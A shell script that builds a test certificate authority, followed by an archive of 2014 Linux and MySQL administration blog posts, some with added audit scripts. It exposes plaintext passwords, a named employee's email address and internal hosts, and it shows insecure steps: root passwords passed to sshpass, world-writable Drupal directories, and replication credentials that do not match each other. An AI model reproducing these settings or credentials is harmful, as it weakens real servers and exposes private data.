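# Minimal config carrying the posts' [certauth], [server] and [client]
# sections. sha256 replaces the posts' md5/sha1 defaults.
write_config() {   # usage: write_config <dir>
    cat > "$1/openssl.cnf" <<'EOF'
[ req ]
default_bits = 2048
default_md = sha256
distinguished_name = req_distinguished_name

[ req_distinguished_name ]
commonName = Common Name

[ certauth ]
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always
basicConstraints = CA:true

[ server ]
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment, dataEncipherment
extendedKeyUsage = serverAuth
nsCertType = server

[ client ]
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment, dataEncipherment
extendedKeyUsage = clientAuth
nsCertType = client
EOF
}

# Issue one end-entity certificate (<name>.key, <name>.cer) signed by the CA
# with the extension section <section>, exactly as the posts' x509 -req step.
issue_cert() {   # usage: issue_cert <dir> <name> <section> <serial> <subject>
    dir="$1"; name="$2"; section="$3"; serial="$4"; subj="$5"
    openssl genrsa -out "$dir/$name.key" 2048 2>/dev/null
    openssl req -config "$dir/openssl.cnf" -new -key "$dir/$name.key" \
        -subj "$subj" -out "$dir/$name.req"
    openssl x509 -req -in "$dir/$name.req" -CA "$dir/ca.cer" -CAkey "$dir/ca.key" \
        -set_serial "$serial" -extfile "$dir/openssl.cnf" -extensions "$section" \
        -days 365 -out "$dir/$name.cer" 2>/dev/null
    rm -f "$dir/$name.req"
}

# Build the whole PKI; sets PKI_DIR for the checks below.
build_pki() {
    PKI_DIR="$(mktemp -d)"
    write_config "$PKI_DIR"
    # Self-signed CA with the certauth extensions and a 10-year validity.
    openssl req -config "$PKI_DIR/openssl.cnf" -newkey rsa:2048 -nodes \
        -keyout "$PKI_DIR/ca.key" -x509 -days 3650 -extensions certauth \
        -subj "/C=IN/ST=Karnataka/L=Bangalore/O=edurite/CN=Example Test CA" \
        -out "$PKI_DIR/ca.cer" 2>/dev/null
    issue_cert "$PKI_DIR" server server 100 "/C=IN/ST=Karnataka/L=Bangalore/O=edurite/CN=10.98.33.136"
    issue_cert "$PKI_DIR" client client 101 "/C=IN/ST=Karnataka/L=Bangalore/O=edurite/CN=rname@some.com"
    # Browser bundle for the client, protected with a constructed password.
    openssl pkcs12 -export -inkey "$PKI_DIR/client.key" -in "$PKI_DIR/client.cer" \
        -passout pass:changeit -out "$PKI_DIR/client.p12"
}

# Does <cert> chain to our CA and carry the extensions for <purpose>
# (sslserver or sslclient)? A server cert presented as a client cert fails
# here because its extendedKeyUsage/nsCertType say serverAuth/server.
cert_ok_for() {   # usage: cert_ok_for <cert file name> <purpose>
    openssl verify -CAfile "$PKI_DIR/ca.cer" -purpose "$2" "$PKI_DIR/$1" >/dev/null 2>&1
}

# Can the exported .p12 be opened with its password? Prints the subject.
p12_subject() {   # usage: p12_subject <password>
    openssl pkcs12 -in "$PKI_DIR/client.p12" -passin "pass:$1" -nokeys -clcerts 2>/dev/null |
        openssl x509 -noout -subject
}

build_pki
for pair in "server.cer sslserver" "client.cer sslclient" \
            "server.cer sslclient" "client.cer sslserver"; do
    set -- $pair
    if cert_ok_for "$1" "$2"; then echo "$1 accepted for $2"; else echo "$1 REJECTED for $2"; fi
done
echo "client.p12 subject: $(p12_subject changeit)"
```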

Thursday, 11 September 2014

Purge logs of MySQL


The PURGE BINARY LOGS statement deletes all the binary log files listed in the log index file prior to the specified log file name or date. BINARY and MASTER are synonyms. Deleted log files also are removed from the list recorded in the index file, so that the given log file becomes the first in the list.

Examples:-

mysql> SHOW BINARY LOGS;
+------------------+-----------+
| Log_name         | File_size |
+------------------+-----------+
| mysql-bin.000034 |  14785707 |
| mysql-bin.000035 |       143 |
| mysql-bin.000036 |       143 |
| mysql-bin.000037 |       120 |
+------------------+-----------+
4 rows in set (0.00 sec)

mysql> PURGE BINARY LOGS BEFORE '2014-09-10';

mysql> PURGE BINARY LOGS BEFORE '2013-04-22 09:55:22';

mysql> PURGE BINARY LOGS TO 'mysql-bin.000015';


ref : https://mariadb.com/kb/en/mariadb/documentation/sql-commands/administration-commands/sql-commands-purge-logs/

Sunday, 24 August 2014

rsync without prompt for password

Run rsync without being prompted for a password, which is useful for cron jobs and scripting. Note that a password given with -p is visible in the process list to other users on the host.

sshpass -p "password" rsync [options] Source-path Destination-path

example:-
sshpass -p "mypassword" rsync -avzpW --recursive root@10.11.11.10:/data/testdata /data/

Friday, 22 August 2014

SSL Certificate on Ubuntu Server

Install SSL Certificate on Ubuntu Server

sudo apt-get install apache2
ifconfig
Browse to http://10.98.33.136 and you should see:
It works!

a2enmod ssl

service apache2 restart

mkdir /etc/apache2/ssl

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/apache.key -out /etc/apache2/ssl/apache.crt

Country Name (2 letter code) [AU]:IN
State or Province Name (full name) [Some-State]:KA
Locality Name (eg, city) []:Bangalore
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Pearson
Organizational Unit Name (eg, section) []:Pearson
Common Name (e.g. server FQDN or YOUR name) []:10.98.33.136
Email Address []:jojan.paul@pearson.com

vi /etc/apache2/sites-available/default

<VirtualHost *:443>
        ServerAdmin webmaster@localhost
        ServerName 10.98.33.136:443
--------------
--------------
SSLEngine on
SSLCertificateFile /etc/apache2/ssl/apache.crt
SSLCertificateKeyFile /etc/apache2/ssl/apache.key
</VirtualHost>

service apache2 restart

Browse to https://10.98.33.136

The browser will warn that the connection is untrusted because the certificate is self-signed; choose I Understand the Risks, then Add Exception, and in the Add Security Exception window click Confirm Security Exception.

It works!

Ref: https://www.digitalocean.com/community/tutorials/how-to-create-a-ssl-certificate-on-apache-for-ubuntu-14-04

Remove the apache2 in Ubuntu

To remove the apache2 service using Terminal:

First stop the apache2 service if it is running with:

sudo service apache2 stop

Now remove and cleanup all the apache2 packages with:

sudo apt-get purge apache2 apache2-utils apache2.2-bin apache2-common

Run this in case any other cleanup is needed:

sudo apt-get autoremove 

You can do the following two tests to confirm apache has been removed:

which apache2
- should return a blank line

sudo service apache2 start 
apache2: unrecognized service

Installing WordPress Apache on RHEL


Download WordPress for apache
wget http://wordpress.org/latest.tar.gz

tar -xvzf latest.tar.gz -C /data

Configure MySQL Database

Connect to MySQL Server & Enter Password
mysql -u root -p
Enter password:

Creating New User for WordPress Database

CREATE USER wordpress@localhost IDENTIFIED BY "your_password_here";

Create New Database
create database wordpress;

Grant Privileges to Database
GRANT ALL ON wordpress.* TO wordpress@localhost;

FLUSH privileges
FLUSH PRIVILEGES;

exit

Configure Apache VirtualHost

vi /etc/httpd/conf/httpd.conf

<VirtualHost 10.33.68.27:80>
ServerAdmin test@test.com
DocumentRoot /data/wordpress
ServerName www.wordpresstest.com
        <Directory /data/wordpress>
        Options FollowSymLinks
        AllowOverride ALL
        </Directory>
</VirtualHost>

service httpd restart

vi /etc/hosts

127.0.0.1  wordpress

Configuring WordPress

cd /data/wordpress
cp wp-config-sample.php wp-config.php

vi wp-config.php

/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'wordpressuser');

/** MySQL database password */
define('DB_PASSWORD', 'Pearson1');

/** MySQL hostname */
define('DB_HOST', '10.161.141.36');

Open your browser and type any of the following address.

http://wordpress/
http://localhost
http://your-ip

Ref: http://www.tecmint.com/install-wordpress-using-lamp-or-lemp-on-rhel-centos-fedora/

Tuesday, 15 July 2014

Install Drupal 7 on Linux


Install PHP 5.3.3 and Apache 2.2.15, then

restart your apache server:
/etc/init.d/httpd restart

For Drupal to work properly with Apache and PHP, add the following to httpd.conf:

vi /etc/httpd/conf/httpd.conf
AddType application/x-httpd-php .html

vi /data/testphp.php
and enter the following, then save:

<?php
phpinfo();
?>

restart your apache server:

/etc/init.d/httpd restart

Configure Mysql to work with Drupal

Install MySQL-5.6

mysql -u root -p
mysql> CREATE DATABASE drupal;
mysql> CREATE USER drupaluser@localhost;
mysql> SET PASSWORD FOR drupaluser@localhost= PASSWORD('typepasswordhere');
mysql> GRANT ALL PRIVILEGES ON drupal.* TO drupaluser@localhost IDENTIFIED BY 'password';
mysql> quit

Finally, let's set up Drupal.

Get the latest package here : http://drupal.org/project/drupal

Copy the file to /data
and unpack it by typing :

tar -xvzf drupal-7.28.tar.gz
cd drupal-7.28
chmod a+w sites/default
cd sites/default
cp default.settings.php settings.php
chmod a+w settings.php
mkdir files
chmod a+w files

vi /etc/httpd/conf.d/vhost

<VirtualHost 10.10.xx.xxx:80>
    ServerName www.testsite.com
    ServerAlias testsite.com
    DocumentRoot "/data/drupal"
    DirectoryIndex index.php
    <Directory "/data/drupal">
        AllowOverride All
        Allow from All
        Options -Indexes
    </Directory>
</VirtualHost>

/etc/init.d/httpd restart

Add an entry in C:\Windows\System32\drivers\etc\hosts
10.10.xx.xxx www.testsite.com

Open up browser and go to :
http://www.testsite.com/drupal-7.28
it will open up a Drupal page !

To prevent unwanted users from modifying them:

chmod go-w settings.php
chmod 757 files

Ref: http://altinukshini.wordpress.com/2011/01/09/how-to-install-drupal-7-on-linux/

Monday, 7 July 2014

Set Up Replication in MySQL


MySQL replication is a process that allows you to easily maintain multiple copies of MySQL data by having them copied automatically from the main-server to a Replica-server database. This can be helpful for many reasons including facilitating a backup for the data, a way to analyze it without using the main database, or simply as a means to scale out.

For the process to work you will need two IP addresses: one of the main-server and one of the Replica-server.

10.10.0.39- main-server Database
10.10.0.40- Replica-server Database

You need a user with sudo privileges and MySQL installed on both servers.

rpm -qa | grep MySQL
MySQL-client-5.6.12-1.el6.x86_64
MySQL-server-5.6.12-1.el6.x86_64
MySQL-devel-5.6.12-1.el6.x86_64
MySQL-shared-compat-5.6.12-1.el6.x86_64
MySQL-shared-5.6.12-2.el6.x86_64

Configure the Main-Server Database

Open up the mysql configuration file

vi /etc/my.cnf
bind-address = 10.10.0.39
log_bin = /data/var/lib/mysql/mysql-bin.log
binlog_do_db = newdatabase
server-id=1

service mysql restart

Grant privileges to the slave.

mysql -u root -p

mysql> GRANT REPLICATION SLAVE ON *.* TO '10.10.0.40'@'%' IDENTIFIED BY 'IctdscayK4blr';
Query OK, 0 rows affected (0.00 sec)

mysql> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.00 sec)

mysql> USE newdatabase;
Database changed

mysql> FLUSH TABLES WITH READ LOCK;
Query OK, 0 rows affected (0.01 sec)


mysql> SHOW MASTER STATUS;
+------------------+----------+--------------+------------------+-------------------+
| File             | Position | Binlog_Do_DB | Binlog_Ignore_DB | Executed_Gtid_Set |
+------------------+----------+--------------+------------------+-------------------+
| mysql-bin.000032 |      523 | newdatabase  |                  |                   |
+------------------+----------+--------------+------------------+-------------------+
1 row in set (0.00 sec)

The File and Position values are required when configuring the slave.

mysqldump -u root -p --opt newdatabase > newdatabase.sql

mysql> UNLOCK TABLES;

mysql> QUIT;


Configure the Replica-Server Database

mysql -u root -p

mysql> CREATE DATABASE newdatabase;

mysql> QUIT;

Import the database that you previously exported from the main-server database.

mysql -u root -p newdatabase < /path/to/newdatabase.sql

vi /etc/my.cnf
#Slave
relay-log = /data/var/lib/mysql/mysql-relay-bin.log
log_bin = /data/var/lib/mysql/mysql-bin.log
binlog_do_db = newdatabase
server-id=2

service mysql restart

Enable the replication from within the MySQL shell.

mysql -u root -p

mysql> CHANGE MASTER TO MASTER_HOST='10.10.0.39',MASTER_USER='root', MASTER_PASSWORD='IctdsdkMSK4blr', MASTER_LOG_FILE='mysql-bin.000001', MASTER_LOG_POS=  523;
Query OK, 0 rows affected 2 warnings (0.01 sec)

The above step designates, (1) the current server as the slave of our main server. (2) It provides the server the correct login credentials. (3) Last of all, it lets the slave server know where to start replicating from; the main-server log file and log position come from the numbers we wrote down previously.

mysql> START SLAVE;

mysql> SHOW SLAVE STATUS\G

mysql> QUIT;


If replication stops on an error, you can skip over the failing event and start the slave again:

mysql> STOP SLAVE;

mysql> SET GLOBAL SQL_SLAVE_SKIP_COUNTER = 1;

mysql> START SLAVE;

Ref :- digitalocean.com

Friday, 20 June 2014

Remove LVM Partitions in Linux


vi /etc/fstab
and remove the existing LVM entry.

lvremove /dev/VGdata/LVdata
Do you really want to remove active logical volume LVdata? [y/n]: y
  Logical volume "LVdata" successfully removed

vgremove VGdata
  Volume group "VGdata" successfully removed

pvremove /dev/sdb1
  Labels on physical volume "/dev/sdb1" successfully wiped

fdisk /dev/sdb

WARNING: DOS-compatible mode is deprecated. It's strongly recommended to
         switch off the mode (command 'c') and change display units to
         sectors (command 'u').

Command (m for help): p

Disk /dev/sdb: 26.8 GB, 26843545600 bytes
64 heads, 32 sectors/track, 25600 cylinders
Units = cylinders of 2048 * 512 = 1048576 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000b6891

   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1               1       25600    26214384   8e  Linux LVM

Command (m for help): d
Selected partition 1

Command (m for help): p

Disk /dev/sdb: 26.8 GB, 26843545600 bytes
64 heads, 32 sectors/track, 25600 cylinders
Units = cylinders of 2048 * 512 = 1048576 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000b6891

   Device Boot      Start         End      Blocks   Id  System

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.
Syncing disks.
You have new mail in /var/spool/mail/root

partprobe
Warning: WARNING: the kernel failed to re-read the partition table on /dev/sda (Device or resource busy).  As a result,

it may not reflect all of your changes until after reboot.

reboot

Broadcast message from arao9aj@mb1utarmiweb01.pearsontc.com
        (/dev/pts/0) at 16:12 ...

The system is going down for reboot NOW!

Ref: http://www.linuxspy.com/1810/how-to-remove-lvm-partitions/

Change the default size of an inode


It is possible to define a non-standard inode size by using the mke2fs tool with the undocumented option -I. The inode size has to be a power of two between EXT2_GOOD_OLD_INODE_SIZE (128 bytes) and the block size in bytes. One reason for doing this is the use of extended attributes. Extended attributes are arbitrary name/value pairs used to store system objects such as Access Control Lists (ACLs). If the inode size is larger than the default, sufficiently small attributes can be stored in the inode itself.

tune2fs -l /dev/mapper/VGdata-LVdata | grep Inode
Inode count:              1572864
Inodes per group:         8192
Inode blocks per group:   512
Inode size:               256

mke2fs -I 8192 /dev/mapper/VGdata-LVdata
mke2fs 1.41.12 (17-May-2010)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
1572864 inodes, 6291456 blocks
314572 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4294967296
192 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
        4096000

Writing inode tables: done
Writing superblocks and filesystem accounting information: done

This filesystem will be automatically checked every 35 mounts or
180 days, whichever comes first.  Use tune2fs -c or -i to override.

tune2fs -l /dev/mapper/VGdata-LVdata | grep Inode
Inode count:              3276800
Inodes per group:         16384
Inode blocks per group:   1024
Inode size:               256

Note that the inode size is still 256 after the format: an inode cannot be larger than the filesystem block size (4096 bytes in the mke2fs output above), so 8192 is not a valid value and was not applied. On a 4096-byte-block filesystem the valid choices are 128, 256, 512, 1024, 2048 and 4096. Always confirm the result with tune2fs -l before loading data onto the filesystem, because by then mke2fs has already destroyed whatever was on the device.
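The following is an added example, not part of the original post, that checks a requested -I value against the rules stated above (power of two, at least 128 bytes, no larger than the block size) before anything destructive is run, so the mistake shown above is caught in advance. The check_device helper is an assumption for illustration; it reads the block size with tune2fs -l, which needs root and an existing ext2/3/4 filesystem.

```shell
#!/bin/sh
# Validate a requested ext2/3/4 inode size against the constraints mke2fs
# enforces: power of two, >= 128 (EXT2_GOOD_OLD_INODE_SIZE), <= block size.
# Usage: valid_inode_size SIZE BLOCKSIZE ; returns 0 when acceptable.
valid_inode_size() {
    size=$1; bs=$2
    [ "$size" -ge 128 ] || return 1
    [ "$size" -le "$bs" ] || return 1
    # Exactly one bit set  <=>  size & (size - 1) == 0
    [ $(( size & (size - 1) )) -eq 0 ] || return 1
    return 0
}

# Space the inode tables will occupy for COUNT inodes of SIZE bytes each,
# so the cost of a larger inode can be weighed before formatting.
inode_table_bytes() {
    echo $(( $1 * $2 ))
}

# Assumed helper (not from the original post): read the block size of a
# live device via tune2fs -l and report whether -I WANT would be accepted.
check_device() {
    dev=$1; want=$2
    bs=$(tune2fs -l "$dev" 2>/dev/null | awk -F: '/^Block size/ { gsub(/ /, "", $2); print $2 }')
    [ -n "$bs" ] || { echo "check_device: cannot read block size of $dev" >&2; return 2; }
    if valid_inode_size "$want" "$bs"; then
        echo "$dev: -I $want is valid (block size $bs)"
    else
        echo "$dev: -I $want is NOT valid (block size $bs)"
        return 1
    fi
}
```

Run check_device /dev/mapper/VGdata-LVdata 8192 on the filesystem above and it reports the request as invalid; 512 or 1024 would pass.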

Ref: http://magazine.redhat.com/2007/04/23/how-can-i-change-the-default-size-of-an-inode-when-i-create-an-ext2ext3-filesystem/

Wednesday, 11 June 2014

Commonly Used Shell Variables


echo $BASH_VERSION --holds the version of this instance of bash
3.2.25(1)-release

echo $HOSTNAME --the name of your computer
LinuxHost

echo $CDPATH --the search path for the cd command (empty by default; a script that relies on cd can be misdirected if this is set)

echo $HISTFILE --the file in which command history is saved
/root/.bash_history

echo $HISTFILESIZE --the maximum number of lines kept in the history file
1000

echo $HISTSIZE --the number of commands remembered in the in-memory history
1000

echo $HOME --the home directory of the current user
/root

echo $IFS --the Internal Field Separator used for word splitting (space, tab and newline by default, so the echo looks blank)

echo $LANG --the locale, which determines the language of messages and the character set and sort order

echo $PATH --the search path for commands, tried from left to right
/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin

echo $PS1 --the primary prompt string
[\u@\h \W]\$

echo $TMOUT --seconds of inactivity after which an interactive bash exits (also the default timeout for the read builtin); unset here, so there is no idle logout

echo $TERM --the terminal type
xterm
export TERM=vt100
export TERM=xterm

echo $SHELL --the user's login shell from /etc/passwd (not necessarily the shell currently running)
/bin/bash

echo $DISPLAY --the X display that graphical programs connect to
export DISPLAY=:0.1

export EDITOR=/usr/bin/vim --name of the default text editor
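Of the variables above, PATH is the one that most often turns into a privilege problem: an empty entry or "." means the current directory is searched, and a world-writable directory on the path lets anyone plant a binary named ls or sudo that shadows the real one. The following is an added example, not part of the original post, that audits a PATH string for those conditions. It assumes GNU coreutils stat (the -c %a form); the audit_path function name is an assumption for illustration.

```shell
#!/bin/sh
# Audit a PATH string for entries that allow command shadowing: empty
# entries and "." (current directory), other relative entries, and
# directories that are world- or group-writable.
# Usage: audit_path [PATHSTRING]  (defaults to the caller's own $PATH)
# Prints one WARN/INFO line per finding; returns 1 if anything was flagged.
audit_path() {
    p=${1:-$PATH}
    rc=0
    # A leading, trailing or doubled ":" is an empty entry, i.e. "."
    case "$p" in
        :*|*:|*::*) echo "WARN: empty entry (current directory) in PATH"; rc=1 ;;
    esac
    old_ifs=$IFS; IFS=:
    for d in $p; do
        case "$d" in
            "")   continue ;;                                  # reported above
            /*)   ;;                                           # absolute: inspect
            *)    echo "WARN: relative entry '$d'"; rc=1; continue ;;
        esac
        if [ ! -d "$d" ]; then
            echo "INFO: '$d' does not exist"
            continue
        fi
        # Octal mode, e.g. 755 or 1777 (GNU stat; BSD stat would need -f).
        perm=$(stat -c %a "$d" 2>/dev/null) || continue
        other=$(( perm % 10 ))
        group=$(( (perm / 10) % 10 ))
        if [ $(( other & 2 )) -ne 0 ]; then
            echo "WARN: '$d' is world-writable (mode $perm)"; rc=1
        elif [ $(( group & 2 )) -ne 0 ]; then
            echo "WARN: '$d' is group-writable (mode $perm)"; rc=1
        fi
    done
    IFS=$old_ifs
    return $rc
}
```

Run audit_path with no argument from a root shell to check the live environment, or pass the PATH line from a user's .bash_profile or a cron file to check it without logging in as that user. Sticky world-writable directories such as /tmp (mode 1777) are flagged too, since the sticky bit only prevents deleting other users' files, not adding a new one.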

Tuesday, 10 June 2014

Find out built in or an external command


type -a bind
bind is a shell builtin

type -a cat
cat is /bin/cat

type -a awk
awk is /bin/awk
awk is /usr/bin/awk

type -a true
true is a shell builtin
true is /bin/true

type -a select
select is a shell keyword


Basic Command Line Editing


Use the following key combinations to edit and recall commands (bash in its default emacs key mode):

CTRL + L : Clear the screen.

CTRL + W : Delete the word before the cursor.

CTRL + U : Delete from the cursor back to the beginning of the line.

Up and Down arrow keys : Recall commands (see command history).

Tab : Auto-complete file, directory and command names and much more.

CTRL + R : Search backwards through previously used commands (see command history); type part of a command and press CTRL + R again for older matches.

CTRL + C : Cancel the currently running command (or discard the line being typed).

CTRL + T : Swap the character under the cursor with the one before it.

ESC + T (or ALT + T) : Swap the word before the cursor with the one before that.

Find out current shell


The shell recorded as your login shell in /etc/passwd, which is not necessarily the shell you are running right now:

echo $SHELL

/bin/bash

Where the bash binary lives (the first match on $PATH):

which bash

/bin/bash

To find out the shell you are actually running, look at the current process ($$ expands to its PID):

ps $$

PID TTY      STAT   TIME COMMAND
29893 pts/0    Ss     0:00 -bash

ps -p $$

PID TTY          TIME CMD
29893 pts/0    00:00:00 bash

Valid login shells

The shells that may be assigned as a login shell are listed in /etc/shells (chsh refuses anything not listed there). The output here also contains /sbin/nologin, the non-shell assigned to service accounts that must never get an interactive login:

cat /etc/shells

/bin/sh
/bin/bash
/sbin/nologin
/bin/tcsh
/bin/csh
/bin/ksh

Wednesday, 28 May 2014

Ways to check Linux OS is 32 bit or 64 Bit


uname -m

x86_64 ==> 64-bit kernel
i686   ==> 32-bit kernel (i386 and i586 are also 32-bit)

uname -m reports the architecture of the running kernel. The remaining commands look at the userland, which can be 32-bit even on a 64-bit kernel, so check both when the answer matters (for example before installing a binary).

getconf LONG_BIT

64 ==> 64-bit userland (size of a C long in the system's libc)
32 ==> 32-bit userland

arch

x86_64 ==> 64-bit kernel (same answer as uname -m)
i686   ==> 32-bit kernel

file /sbin/init

/sbin/init: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, stripped    ==> 64-bit userland

/sbin/init: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.9, dynamically linked (uses shared libs), for GNU/Linux 2.6.9, stripped   ==> 32-bit userland

In Ubuntu

dpkg --print-architecture

amd64 ==> 64-bit packages installed
i386  ==> 32-bit packages installed

Ref: http://stackoverflow.com/questions/246007/how-to-determine-whether-a-given-linux-is-32-bit-or-64-bit



Tuesday, 27 May 2014

Change Run Levels in Linux


Find Out Current Run Level

who -r
run-level 3  2014-05-27 17:04

Or

runlevel
N 3

Use the init (or telinit) command to change run levels; for example, to drop to single-user mode, which stops networking and most services:

init 1

To change the default run level, edit the initdefault line in /etc/inittab (never set it to 0 or 6, which would halt or reboot the machine in a loop):

vi /etc/inittab
id:5:initdefault:

Reboot the system to see the change take effect:

reboot

This applies to SysV init (RHEL/CentOS 6 and older); systemd-based systems use targets (systemctl set-default) instead of /etc/inittab.

Ref:
http://www.cyberciti.biz/tips/linux-changing-run-levels.html
http://www.ibm.com/developerworks/library/l-lpic1-v3-101-3/

Monday, 19 May 2014

Clear Memory Cache on Linux Server

Flush file system buffers by executing,

# sync

Kernels 2.6.16 and newer provide a mechanism to have the kernel drop the page cache and/or the inode and dentry caches on command, which frees memory that was only being used as cache.

To free page cache:

# echo 1 > /proc/sys/vm/drop_caches

To free dentries and inodes:

# echo 2 > /proc/sys/vm/drop_caches

To free page cache, dentries and inodes:

# echo 3 > /proc/sys/vm/drop_caches

or

# sync; echo 3 > /proc/sys/vm/drop_caches

Run sync first because drop_caches is non-destructive: it only discards clean objects, and dirty (not yet written back) pages are never freed. sync writes them out so that as much of the cache as possible becomes freeable. The write to /proc must be performed by root; a plain "sudo echo 3 > /proc/sys/vm/drop_caches" fails because the redirection is done by the unprivileged shell, not by sudo.

Bear in mind that the page cache is the kernel's read cache and is reclaimed automatically under memory pressure. Dropping it is useful for benchmarking or before measuring a process's real memory use; on a production server it only forces data to be re-read from disk.

To clear the cache on a particular interval, put the command in a script and run it from root's crontab:

vi cacheclear.sh

#!/bin/sh
# sh -c runs the redirection with root privileges as well; run from root's
# crontab the sudo is unnecessary but harmless.
sudo sh -c "sync; echo 3 > /proc/sys/vm/drop_caches"
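Before dropping caches it is worth knowing how much is actually reclaimable, since the dirty part stays until sync writes it out. The following is an added example, not part of the original post, that reads the relevant /proc/meminfo fields and wraps the drop in a root check; the meminfo path is a parameter so the report can be run against a saved copy of the file, and the function names are assumptions for illustration. The reclaimable figure is an approximation (Cached plus Buffers minus Dirty).

```shell
#!/bin/sh
# meminfo_kb FIELD [FILE] -> value of FIELD in kB (0 if the field is absent)
meminfo_kb() {
    awk -v k="$1:" '$1 == k { v = $2 } END { print v + 0 }' "${2:-/proc/meminfo}"
}

# cache_summary [FILE] -> one line with cached, buffers, dirty and the
# approximate amount drop_caches could free once sync has run.
cache_summary() {
    f=${1:-/proc/meminfo}
    cached=$(meminfo_kb Cached "$f")
    buffers=$(meminfo_kb Buffers "$f")
    dirty=$(meminfo_kb Dirty "$f")
    echo "cached=$cached buffers=$buffers dirty=$dirty reclaimable=$(( cached + buffers - dirty ))"
}

# drop_caches_safely: refuse unless root, flush dirty pages first, then drop
# page cache, dentries and inodes, and report the change in MemFree.
# The redirection happens inside this (root) shell, so no sudo juggling.
drop_caches_safely() {
    [ "$(id -u)" -eq 0 ] || { echo "drop_caches_safely: must run as root" >&2; return 1; }
    before=$(meminfo_kb MemFree)
    sync
    echo 3 > /proc/sys/vm/drop_caches
    after=$(meminfo_kb MemFree)
    echo "MemFree: $before kB -> $after kB"
}
```

Call cache_summary as any user to see the numbers; drop_caches_safely is the part that needs root.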

Ref: http://www.unixmen.com/how-to-clear-memory-cache-on-linux-servers/

Sunday, 18 May 2014

Force fsck in Linux


fsck stands for "file system check" and it is used to check and optionally repair one or more Linux file systems. Normally, the fsck program will try to handle filesystems on different physical disk drives in parallel to reduce the total amount of time needed to check all of the filesystems

Log in as root:
su -

Create an empty file called forcefsck in the root directory; the boot scripts look for it, run fsck on the filesystems listed in /etc/fstab before they are mounted read-write, and remove the file afterwards:
touch /forcefsck

Now reboot the system:
reboot

Alternatively, as root, reboot and force the check in a single command:

shutdown -rF now

The -F option of the sysvinit shutdown forces fsck on reboot (it creates /forcefsck for you). Either way the check runs at boot, before the filesystems are in use, which is the only safe time to repair them: never run fsck on a mounted filesystem.


Ref:
http://www.cyberciti.biz/faq/linux-force-fsck-on-the-next-reboot-or-boot-sequence/
https://wiki.archlinux.org/index.php/fsck


Thursday, 15 May 2014

Recursively list all hidden files and directories


The basic syntax is as follows:

find /dir/to/search/ -name ".*" -print

find /dir/to/search/ -name ".*" -ls

search only hidden files:

find /dir/to/search/ -type f -iname ".*" -ls

search only hidden directories:

find /dir/to/search/ -type d -iname ".*" -ls

search for anything with a hidden component anywhere in its path (this also lists every file inside every hidden directory, so the output is much longer):

find /dir/to/search -path '*/.*' -print
find /dir/to/search -path '*/.*' -ls

In this example, search $HOME for all hidden files and dirs:

find $HOME -name ".*" -ls

135237    4 -rw-r--r--   1 root     root           18 May 20  2009 /root/.bash_logout
137605    4 -rw-------   1 root     root           32 May 15 01:08 /root/.mysql_history
135240    4 -rw-r--r--   1 root     root          100 Sep 22  2004 /root/.cshrc
131153    4 drwxr-----   3 root     root         4096 Feb 27 19:28 /root/.pki
136444    4 -rw-r--r--   1 root     root          686 Feb 27 07:22 /root/.bash_profile
137510    4 drwx------   2 root     root         4096 May  8 02:00 /root/.ssh
135241    4 -rw-r--r--   1 root     root          129 Dec  3  2004 /root/.tcshrc
136494    4 -rw-r--r--   1 root     root          310 Feb 27 07:22 /root/.bashrc
137490   16 -rw-------   1 root     root        14970 May 15 01:02 /root/.bash_history
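Hidden entries are also where intruders park tools, typically under world-writable places such as /tmp or /dev/shm and with names like ". " (dot space) or "..." that look empty in a casual ls. The following is an added example, not part of the original post, that lists each hidden file and directory once (pruning so the contents of a hidden directory are not repeated) and marks those deceptive names; it assumes GNU find (-printf, -mindepth) and the function names are assumptions for illustration.

```shell
#!/bin/sh
# hidden_entries DIR...  -> "TYPE PATH" lines (TYPE is d for dir, f for file)
# A hidden directory is printed and then pruned, so its contents are not
# listed separately; non-hidden directories are still descended into.
hidden_entries() {
    for root in "$@"; do
        find "$root" -mindepth 1 -name '.*' \( -type d -prune -o -true \) \
            -printf '%y %p\n' 2>/dev/null
    done
}

# Names chosen so that ls output looks empty or like "." and "..".
suspicious_name() {
    case "$1" in
        '. '|'.. '|'...'|'....') return 0 ;;
    esac
    return 1
}

# hidden_report DIR... -> same lines, with "SUSPECT" prepended where the
# basename is one of the deceptive names above.
hidden_report() {
    hidden_entries "$@" | while IFS= read -r line; do
        path=${line#* }
        base=$(basename "$path")
        if suspicious_name "$base"; then
            echo "SUSPECT $line"
        else
            echo "$line"
        fi
    done
}
```

A typical sweep on a suspect host is hidden_report /tmp /var/tmp /dev/shm /home, then inspect anything marked SUSPECT with ls -la and stat before touching it.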

Ref: http://www.cyberciti.biz/faq/unix-linux-centos-ubuntu-find-hidden-files-recursively/

Recursively list all files and directories


ls -alR

find . -exec ls -dl \{\} \; | awk '{print $3, $4, $9}'

The awk version above breaks on names containing spaces (the name spills past field 9) and spawns one ls per entry; -printf prints owner, group and path directly:

find . -printf "%u %g %p\n"

tree -p -u -g -f -i

tree -p -u -g -f

find $PWD -type f

find . -ls

List only .html files

find . -name "*.html"

Ref: http://stackoverflow.com/questions/501367/how-to-recursively-list-all-files-and-directories

Wednesday, 14 May 2014

History Command in Linux


List All Executed Commands in Linux

history

